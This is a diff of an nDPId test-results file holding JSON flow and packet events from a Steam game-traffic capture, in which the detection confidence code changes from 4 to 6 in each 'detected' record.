@@ -2,173 +2,173 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1357332164693} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkx\/AqLyVkkKYDbJhaYoALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1357332164693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164693,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYsALLORVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164693,"flow_last_seen":1357332164693,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164693,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYoALBkuVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"steam.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1357332164694,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164694,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+L3AqLyVUatzBrJhaYkALBkxVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"steam.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164694,"flow_last_seen":1357332164694,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164694,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.6","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1357332164736,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164736,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR5qbAqLyVRRyRrLJhaYoALAcZVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164736,"flow_last_seen":1357332164736,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164736,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"69.28.145.172","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYkALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"steam.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARHb3AqLyVRI5bJLJhaYkALD4wVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"steam.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"68.142.91.36","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1357332164737,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164737,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARkyDAqLyVkkKYDLJhaYoALLOSVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164737,"flow_last_seen":1357332164737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164737,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"steam.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1357332164761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1357332164761,"pkt":"AAwp3FvtAFBW4RiuCABFAABIWSYAAIARjXhFHJGswKi8lWmKsmEANLLiVlMwMQgAAgAAAAAAAAYAAAEAAAABAAAAAAAAAAAAAAAAAAAAzAy3GMcAAAA="} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1357332164786,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164786,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LzAqLyVUatzB7JhaYoALBkvVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"steam.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164786,"flow_last_seen":1357332164786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164786,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.7","src_port":45665,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEARQazAqLyV0G+rU7JhaYkALGIfVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"steam.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.171.83","src_port":45665,"dst_port":27017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1357332164787,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1357332164787,"pkt":"AFBW4RiuAAwp3FvtCABFAABAAABAAEAR+LvAqLyVUatzCLJhaYsALBktVlMwMQAAAQAABgAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 
+00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"steam.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1357332164787,"flow_last_seen":1357332164787,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1357332164787,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"81.171.115.8","src_port":45665,"dst_port":27019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 